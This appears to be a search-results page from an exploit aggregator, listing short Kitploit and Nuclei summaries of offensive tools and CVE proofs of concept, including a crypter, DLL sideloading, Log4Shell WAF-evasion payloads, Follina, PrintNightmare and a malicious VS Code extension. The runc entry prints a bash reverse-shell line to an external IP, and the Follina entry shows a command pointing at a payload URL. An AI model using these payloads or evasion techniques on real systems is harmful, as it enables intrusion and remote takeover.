Lucene search
+L

31251 matches found

Kitploit
Kitploit
added 2026/09/22 5:55 a.m.8 views

BumbleCrypt

BumbleCrypt 一个受 Bumblebee 启发的 Crypter 背景 BumbleCrypt 的灵感源自 Bumblebee 的 crypter。在 Bumblebee 的案例中,主 Bumblebee DLL 被加载到内存中,并按以下方式执行: 解密并将 payload 写入 Heap(堆)中 Hook 三个 NtApi —— NtOpenFile、NtCreateSection 和 NtMapViewOfSection 调用 LoadLibraryW"gdiplus.dll",这会触发 inline hooks,因为上述三个 API 会被 LoadLibrary...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 5:55 a.m.10 views

NimDllSideload

Nim DLL 侧加载 此仓库可让你轻松生成可用于侧加载/代理加载的 Nim DLL。 如果你不太了解什么是 DLL 侧加载,可以看看这篇博客文章。 我该如何使用? 将你想要代理的合法 DLL(或多个 DLL)放入此仓库的 build 目录,然后运行 make。 这将在 out 目录中生成两个 .dll: 名称随机的那一个是原始 DLL,函数调用将被代理到它 另一个将是你的有效载荷 如果侧加载成功,你应该会看到一个消息框弹出和/或一个文件被写入桌面。 要实际“武器化”有效载荷,你可以查看 OffensiveNim 仓库获取思路和现成的代码片段 :。 它是如何工作的? dllproxy.n...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/22 5:54 a.m.6 views

ManualRsrcDataFetching

ManualRsrcDataFetching:一个用于替代 FindResource & LoadResource & LockResource & SizeofResource Windows API 的函数。 注意:Payload.ico 是一个 x64 calc shellcode...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 4:59 a.m.9 views

CVE-2019-5736

🖥️ -h3x0v3rl0rd- ️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit CVE-2019-5736. Download file main.go, change the payload in the file into: root@kitploit: var payload = "!/bin/bash \n bash -i & /dev/tcp/10.10.14.12/1234 0&1" After that, run:...

9.3CVSS7.1AI score0.98452EPSS
SaveExploits35
Kitploit
Kitploit
added 2026/09/22 4:58 a.m.8 views

CVE-2014-6287

Rejetto HttpFileServer 2.3.x - Remote Command Execution CVE-2014-6287 🚨 About the Exploit This is a proof-of-concept exploit for the well-known Remote Command Execution vulnerability in Rejetto HttpFileServer HFS v2.3.x , identified as CVE-2014-6287. By abusing the vulnerable search functionality...

10CVSS8.6AI score0.99323EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/22 4:56 a.m.11 views

Log4Shell-obfuscated-payloads-generator

Log4Shell-obfuscated-payloads-generator Log4Shell-obfuscated-payloads-generator可以生成初级混淆的或二级混淆的CVE-2021-44228或CVE-2021-45046 payloads,以规避WAF检测。 Log4Shell-obfuscated-payloads-generator的设计思想 安装 root@kitploit: git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git...

10CVSS8.3AI score0.99999EPSS
SaveExploits377References1
Kitploit
Kitploit
added 2026/09/22 3:59 a.m.9 views

CVE-2017-8759

Exploit tool CVE-2017-8759 Exploit tool CVE-2017-8759 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / other payload to victim...

9.3CVSS7.5AI score0.88698EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/22 3:57 a.m.10 views

CVE-2021-34527

CVE-2021-34527 PrintNightmare PoC 👾 📝 Descripción Este sencillo script en Python te permite enviar un payload a una dirección IP y puerto objetivo utilizando el protocolo SMB. Está diseñado para demostrar el uso de un payload de exploit SMB con fines educativos. El payload es un mensaje SMB...

9CVSS8AI score0.99792EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/22 3:52 a.m.13 views

CSRFER

CSRFER root@kitploit: / / | \ | | \ | / /\ --.| |/ / | | | | |/ / | | --. \ /| | | || / | /// / |\ | | | || |\ \ //| \| /| | -.--. " '-, ',' 2 \ \q \ . \ .--' '----. / . . \ .'.' \ .-.\ '-, ,/ .---;- . \ \ .\ // '-. \ \ | '. , '-. c=' Cooo -. '-. '. '-. \ snd '-. '. '-. \ ---' CSRFER...

6.1AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/22 3:41 a.m.7 views

Demonstration-of-CVE-2023-38831-via-Reverse-Shell-Execution

CVE-2023-38831 Reverse Shell Demonstration This repository contains a PDF summary and screenshots of a lab-based demonstration of CVE-2023-38831. The vulnerability allows attackers to embed and execute malicious payloads in compressed files. In this case, the payload triggers a reverse shell...

7.8CVSS7.3AI score0.98022EPSS
SaveExploits49
Kitploit
Kitploit
added 2026/09/22 3:36 a.m.10 views

CVE-2025-64512-Polyglot-PoC

CVE-2025-64512 Polyglot Payload In the last weeks in November 2025, an interesting vulnerability CVE-2025-64512 was disclosed in pdfminer.six, a popular Python project to process PDF files, used in particular in AI pipelines. The vulnerability enables remote code execution by deserializing...

8.6CVSS7.5AI score0.00312EPSS
SaveExploits10References1
Kitploit
Kitploit
added 2026/09/22 3:34 a.m.9 views

CVE-2023-26208

CVE-2023-26208 Exploit Automation For Educational Purposes 🚨 📌 Description This is a Python script with a graphical interface Tkinter that allows the user to test automated request submissions to a login endpoint. The goal is to simulate how servers respond to different payload sizes and analyze...

5.3CVSS5.6AI score0.01812EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/22 3:06 a.m.9 views

CVE-2025-51863

CVE-2025-51863 Vulnerability description ChatGPTUtil is a AI-powered chatbot assistant, providing access to both ChatGPT and an AI image generator. A Self Cross-Site Scripting Self-XSS vulnerability exists in the chat component. This can lead to cookie theft leading to remote account hijacking...

6.1CVSS6AI score0.00281EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/22 3:03 a.m.10 views

CVE-2018-14667_Lab_POC

CVE-2018-14667-Lab 实验前提条件 演示应用来自:http://downloads.jboss.org/richfaces/releases/3.3.X/3.3.4.Final/richfaces-examples-3.3.4.Final.zip Jboss 5.1.0.GA 来自 JBOSS 下载存档:https://repository.jboss.org/sourceforge/ Jdk-6u45-linux-x64 来自 JAVA...

9.8CVSS8.2AI score0.74171EPSS
SaveExploits8References1
Kitploit
Kitploit
added 2026/09/22 3:01 a.m.7 views

Follina-CVE-2022-30190-POC

Nee 的 Follina-CVE-2022-30190 概念验证 用法 root@kitploit: python3 follina.py --payload-url "http://192.168.200.144:1337/pwn.html" 功能说明 创建一个恶意 Word 文件,该文件指向你指定的 payload 网址 托管位于 web 文件夹中的默认 payload 概念验证默认弹出计算器 欢迎随意修改并提交 :...

9.3CVSS8.1AI score0.99234EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/22 2:57 a.m.10 views

CVE-2021-34527

CVE-2021-34527 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | June 1, 2021 UPDATE June 2 2021 : Microsoft has released an advisory on CVE-2021-34527, correctly terming that specific identifier as the PrintNightmare vulnerability exploit. Previously, the community was assuming...

9CVSS8.2AI score0.99792EPSS
SaveExploits42References5
Kitploit
Kitploit
added 2026/09/22 2:43 a.m.12 views

CVE-2025-55319-PoC

Reference: CVE-2025-55319 针对 HTB "Checkpoint" 挑战的 VS Code .vsix 扩展概念验证。 安装后,扩展自动激活并产生一个隐藏的 PowerShell 反向 shell 回连到攻击者。 ⚠️ 仅限授权使用。 这是一个 CTF/实验室环境产物。仅可部署在你拥有或明确授权测试(例如 HTB 目标机)的机器上。 工作原理 extension/package.json — 扩展清单。"activationEvents": "" 使它在 VS Code 加载时即刻运行,无需用户交互。 extension/extension.js — 在...

9.8CVSS7.7AI score0.00918EPSS
SaveExploits1
Nuclei
Nuclei
added 2026/09/22 2:05 a.m.146 views

MOVEit Transfer - SQL Injection

In Progress MOVEit Transfer before 2020.1.11 12.1.11, 2021.0.9 13.0.9, 2021.1.7 13.1.7, 2022.0.7 14.0.7, 2022.1.8 14.1.8, and 2023.0.4 15.0.4, a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized...

9.1CVSS8.1AI score0.95184EPSS
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/22 1:04 a.m.17 views

CVE-2025-6019

CVE-2025-6019 PoC 针对 UDisks2 XFS 调整大小权限提升的简单概念验证。 文件 createpayload.sh:构建包含 SUID rootbash 载荷的 XFS 镜像。 exploit.sh:触发调整大小路径并启动 SUID shell。 要求 mkfs.xfs、udisksctl、gdbus、loginctl 一个 allowactive Polkit 会话(例如,物理控制台登录,或通过另一个漏洞(如 CVE-2025-6018)获得的会话) 由 createpayload.sh 生成的精心构造的 XFS 文件系统镜像 用法 1. 创建载荷镜像:...

7CVSS7.9AI score0.00469EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/22 12:54 a.m.9 views

AcrStealer-Custom-Protocol-Credential-Theft-Payload-Extraction-Analysis

1. 网络连接与 SSL/TLS 配置 通过 Process Hacker 内存分析发现,AcrStealer 使用 SSL/TLS 建立网络连接,以与其 C2 服务器进行安全通信。 关键观察: SslClientCert – 使用客户端证书进行身份验证(规避检测)。 EnabledProtocols – 指定支持的 TLS 协议(例如 TLS 1.2、1.3)。 EnabledRevertToSelfClientCertificate – 允许回退到自签名证书。 Connection / DataChunks – 表示活跃的数据传输。 Available – 待发送的数据缓冲区。...

5.8AI score
SaveExploits0
Rows per page
Query Builder